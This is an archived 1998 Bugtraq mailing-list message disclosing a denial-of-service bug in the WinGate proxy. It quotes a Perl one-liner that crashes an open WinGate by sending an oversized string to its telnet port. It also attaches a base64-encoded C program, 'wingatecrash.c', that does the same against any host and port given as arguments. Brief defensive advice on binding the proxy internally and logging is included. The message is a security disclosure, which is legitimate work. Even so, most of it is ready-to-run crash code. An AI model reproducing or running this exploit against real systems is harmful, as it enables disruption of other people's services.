[8562] in bugtraq
Re: crashing wingates
daemon@ATHENA.MIT.EDU (Eric Wanner)
Sat Nov 14 21:18:53 1998
Date: Sat, 14 Nov 1998 17:52:13 -0700
Reply-To: Eric Wanner <ericw@FUTUREONE.COM>
From: Eric Wanner <ericw@FUTUREONE.COM>
X-To: G23 <g23@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19981113182512.18823.qmail@www01.netaddress.usa.net>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---559023410-758783491-911091133=:3068
Content-Type: TEXT/PLAIN; charset=US-ASCII
Well, here is my C version of your script =). It takes the host and
optional port as arguments. Compiled and ran on several
slackware-linux/x86 boxes. Just more proof that wingate is way too
insecure to leave an opening to the outside.
--
Eric Wanner
Head Systems Administrator
FutureOne, Inc.
602-385-3379
http://home.futureone.com
On Sat, 14 Nov 1998, G23 wrote:
> Hello,
>
> The following one-liner will crash an open Wingate.
>
> perl -MIO::Socket -e \
> 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
> ->send("X" x 4400 . "\n",0)'
>
> Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable. The above is my rendition of a 44 line sh script written by "rEWTED" (kefka@infected.org).
>
> Anyone configuring a proxy for LAN use should only bind to an internal
> interface anyway. (IE, kidz shouldn't even see your proxy)
> http://wingate.net/helppages/wingate2Securing_your_network.html
>
> If you do provide telnet proxy for the world, then at least log.
> http://wingate.net/helppages/wingate2Auditing_and_Logging.html
>
> ghost23
>
>
>
> ____________________________________________________________________
> Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
>
---559023410-758783491-911091133=:3068
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="wingatecrash.c"
Content-ID: <Pine.GSO.3.96.981114175213.3068C@future.futureone.com>
Content-Description:
Content-Transfer-Encoding: BASE64
LyogQmxhaCwgYmxhaCwgYmxhaCwgSSBhbSBub3QgbGlhYmxlIGZvciBhbnl0
aGluZyB0aGlzIHByb2dyYW0NCiAgIGRvZXMsIG9yIHdoYXQgYW55b25lIGRv
ZXMgd2l0aCBpdC4gIFRISVMgUFJPR1JBTSBDT01FUyBXSVRIDQogICBOTyBX
QVJSQU5UWSwgQU5EIFRIRSBBVVRIT1IgSVMgSU4gTk8gRVZFTlQgTElBQkxF
IEZPUiBBTllUSElORw0KICAgVEhBVCBIQVBQRU5TIFdJVEggSVQsIElOQ0xV
RElORyBJRiBJVCBTQ1JFV1MgWU9VUiBTWVNURU0sIE9SDQogICBTT01FT05F
IFVTRVMgSVQgVE8gU0NSRVcgWU9VUiBTWVNURU0sIE9SIFlPVSBHRVQgSU4g
VFJPVUJMRQ0KICAgRk9SIFNDUkVXSU5HIFNPTUVPTkUnUyBTWVNURU0uICBU
aGlzIHByb2dyYW0gaXMgZm9yIGF1ZGl0aW5nDQogICB5b3VyIG93biBzeXN0
ZW0gb25seSwgbm90IGZvciBEb1MgYXR0YWNrcy4gSSBhbSBub3QgbGlhYmxl
DQogICBmb3IgYW55dGhpbmcgeW91IG9yIGFueW9uZSBlbHNlIGRvZXMgd2l0
aCB0aGlzIHByb2dyYW0uICBUaGlzDQogICBwcm9ncmFtIGlzIGZvciBhdWRp
dGluZyBhbmQgaW5mb3JtYXRpb25hbCBwdXJwb3NlcyBvbmx5IQ0KKi8NCi8q
IEZlZWwgZnJlZSB0byBtb2RpZnkgdGhpcyBzaGl0LCBidXQgZ2l2ZSBtZSBj
cmVkaXQuDQoNCiAgIDExLzE0LzE5OTggaG9sb2J5dGUNCiAgIGhvbG9ieXRl
QGhvbG9ieXRlLm9yZw0KKi8NCi8qIEJhc2VkIG9uIHRoZSBidWd0cmFxIHJl
bGVhc2UgYnkgZzIzQHVzYS5uZXQgKi8NCiNpbmNsdWRlIDxzeXMvdHlwZXMu
aD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8c3RkaW8u
aD4NCiNpbmNsdWRlIDxuZXRkYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0K
I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCg0KbWFpbiAoaW50IGFyZ2MsIGNo
YXIgKmFyZ3ZbXSkgew0KCWludCBzb2NrZmQ7DQoJc3RydWN0IHNvY2thZGRy
X2luIHN0YWRkcjsNCglpbnQgcG9ydDsNCglzdHJ1Y3QgaG9zdGVudCAqdG1w
X2hvc3Q7DQoJdW5zaWduZWQgbG9uZyBpbnQgYWRkcjsNCglpbnQgY29ubmZk
Ow0KCWludCBpOw0KDQoJcHJpbnRmKCJXaW5nYXRlIGNyYXNoZXIgYnkgaG9s
b2J5dGUgPGhvbG9ieXRlQGhvbG9ieXRlLm9yZz5cblxuIik7DQoJaWYgKGFy
Z2MgIT0gMiAmJiBhcmdjICE9IDMpIHsgcHJpbnRmKCJVc2FnZTogJXMgPHdp
bmdhdGU+IFtwb3J0KGRlZnVhbHQ9MjMpXVxuIixhcmd2WzBdKTsgZXhpdCgx
KTsgfQ0KCWlmIChhcmdjID09IDIpIHsgcG9ydD0yMzsgfSBlbHNlIHsgcG9y
dD1hdG9pKGFyZ3ZbMl0pOyB9DQoJaWYgKCEocG9ydCA+IDAgJiYgcG9ydCA8
IDY1NTM2KSkgeyBwcmludGYoIkludmFsaWQgcG9ydFxuIik7IGV4aXQoMik7
IH0NCgkvKiBJZiB0aGlzIHJldHVybnMgLTEgd2UnbGwgdHJ5IHRvIGxvb2sg
aXQgdXAuICBJIGRvbid0IGFzc3VtZSBhbnlvbmUgd2lsbCBiZSBwdXR0aW5n
DQoJaW4gMjU1LjI1NS4yNTUuMjU1LCBzbyBJJ2xsIGdvIHdpdGggaW5ldF9h
ZGRyKCkgKi8NCgliemVybygmc3RhZGRyLHNpemVvZihzdGFkZHIpKTsNCglp
ZiAoKHN0YWRkci5zaW5fYWRkci5zX2FkZHIgPSBpbmV0X2FkZHIoYXJndlsx
XSkpID09IC0xKSB7DQoJCXRtcF9ob3N0ID0gZ2V0aG9zdGJ5bmFtZShhcmd2
WzFdKTsNCgkJaWYgKHRtcF9ob3N0ID09IE5VTEwpIHsgcHJpbnRmKCJDb3Vs
ZCBub3QgZ2V0IHZhbGlkIGFkZHIgaW5mbyBvbiAlczogdG1wX2hvc3RcbiIs
YXJndlsxXSk7IGV4aXQoNyk7fSBlbHNlIHsNCgkJCW1lbWNweSgoY2FkZHJf
dCAqKSZzdGFkZHIuc2luX2FkZHIuc19hZGRyLHRtcF9ob3N0LT5oX2FkZHIs
dG1wX2hvc3QtPmhfbGVuZ3RoKTsNCgkJCWlmIChzdGFkZHIuc2luX2FkZHIu
c19hZGRyID09IC0xKSB7IHByaW50ZigiQ291bGQgbm90IHZhbGlkIGFkZHIg
aW5mbyBvbiAlczogYWRkciAtMVxuIixhcmd2WzFdKTsgZXhpdCg4KTsgfQ0K
CQl9DQoJfQ0KCWlmICgoc29ja2ZkID0gc29ja2V0KEFGX0lORVQsIFNPQ0tf
U1RSRUFNLCAwKSkgPCAwKSB7IHBlcnJvcigiU29ja2V0Iik7IGV4aXQoMyk7
IH0NCglzdGFkZHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoJc3RhZGRyLnNp
bl9wb3J0ID0gaHRvbnMocG9ydCk7DQoJaWYgKGNvbm5lY3Qoc29ja2ZkLCAo
c3RydWN0IHNvY2thZGRyICopICZzdGFkZHIsIHNpemVvZihzdGFkZHIpKSA8
IDApIHsgcGVycm9yKCJDb25uZWN0Iik7IGV4aXQoNCk7IH0NCglwcmludGYo
IkNvbm5lY3RlZC4uLiBDcmFzaGluZyIpOw0KCWZvciAoaT0wO2k8MTAwO2kr
Kykgew0KCQlpZiAoKHdyaXRlKHNvY2tmZCwiWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgiLDQ0KSkgPCAwKSB7IHBlcnJv
cigiV3JpdGUiKTsgZXhpdCg1KTsgfQ0KCQlwdXRjKCcuJyxzdGRvdXQpOw0K
CQlmZmx1c2goc3Rkb3V0KTsNCgl9DQoJaWYgKHdyaXRlKHNvY2tmZCwiXG4i
LDEpIDwgMCkgeyBwZXJyb3IoIkZpbmFsIFdyaXRlIik7IGV4aXQoNik7IH0N
CglwdXRjKCdcbicsc3Rkb3V0KTsNCglmZmx1c2goc3Rkb3V0KTsNCgljbG9z
ZShzb2NrZmQpOw0KfQ0K
---559023410-758783491-911091133=:3068--